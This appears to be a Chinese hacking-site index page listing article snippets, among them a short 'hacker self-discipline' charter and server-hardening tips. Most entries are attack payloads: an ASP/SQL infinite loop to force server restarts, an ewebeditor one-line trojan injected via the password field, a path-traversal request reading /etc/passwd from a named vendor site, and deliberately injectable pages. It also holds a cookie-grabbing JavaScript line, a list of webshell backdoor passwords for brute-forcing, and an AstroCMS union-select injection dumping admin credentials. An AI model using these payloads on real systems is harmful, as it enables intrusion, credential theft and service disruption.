COG黑客自律公约(草案)
《COG黑客自律公约》(草案) 第1节 《 COG黑客自律公约》制定的原则 《COG黑客自律公约》参考了联合国大会2002年的第57/239号决议“创造全球网 络安全文化”和2004年的第58/199号决议“创造全球网络安全文化及保护重要的信 息基础设施”以及社会业界对黑客精神等方面的解释与研究。《COG黑客自律公约》 不是法律,若有不符合现行法律的,以现行法律为准。 《COG黑客自律公约》适用于...
WEBSHELL重启服务器的方法?
把下面代码保存成webshell.asp,然后访问。CPU暴。管理员重启。 <% for i = 1 to 100 i = 10 next %> DB-OWNER权限下让服务器重启 SQL命令:wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd– 收集一下。会有用的哦!!
ewebeditor 2.8 后台插马
ewebeditor 2.8 后台插上一句话 影响版本:2.8 商业版 攻击利用:登陆后台,点击修改密码—新密码设置为 1″:eval request(“a”)’ 设置成功后,访问https://www.webshell.cc/ewebeditor/asp/config.asp文件即可, 一句话木马被写入到这个文件里面了.
服务器安全设置
1.将mysql运行在普通用户权限下,这是最重要的一点,大部分的入侵都是利用数据库的权限进行的。 MYSQL的降权运行 新建立一个用户比如mysqlstart net user mysqlstart fuckmicrosoft /add net localgroup users mysqlstart /del 不属于任何组 如果MYSQL装在d:\mysql ,那么,给 mysqlstart 完全...
nod32杀毒官方任意下载文件漏洞
漏洞证明: http://www.eset.com.cn/api/desk/download.php?file=../../../../../../../etc/passwd http://www.eset.com.cn/api/desk/download.php?file=../../../../../../../etc
ASP ASPX PHP 构造注入页面的代码
把下面的代码分别保存为ASP。PHP。ASPX Mssql: <!–#include file=”conn.asp”–> <% hid=request.QueryString(“id”) sql=”select * from admin where id=”&hid set rs=conn.execute (sql) %> Access: <% db=”asp...
google hack技术资料
利用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。www.webshell.cc是全国著名大学之一,一次偶然的机会我决定对其站点进行一次测试(文中所涉及该学校的信息均已经过处理,请勿对号入座:) 首先用google先看这个站点的一些基本情况(一些细节部分就略去了): site:webshell.cc 从返回的信息中,找...
手工抓取COOKIE
javascript:alert;window.clipboardData.setData('text',document.cookie); 在IE里输入以上代码,然后直接用ctrl+V,粘贴出来的内容就是你所要抓的cookie了。
国内各类 WebShell 密码大全 爆破、社工用 webshell-password
国内各类 WebShell 后门密码大全,已剔除重复: 名称 密码 6.0 VIP(防破解版 12345 - yanghai或者168888 (中国数据) rinima . tg [D.s.T]会员专用WebShell darkst [HxHacK]华夏黑客联盟 192298273208298273192298273185298273187298273195298273 [华夏黑客小豪]Shell...
AstroCMS多重远程缺陷及修复
下载地址: http://www.astrocms.com/ 忘记密码处注射: /registration/forgot/ a' union select 0,0,0,0,concat_ws(0x3a,login,password,email,status ,level),0,0,0,0,0,0,0 from auth_users where id=5# id=6 - usually admin ...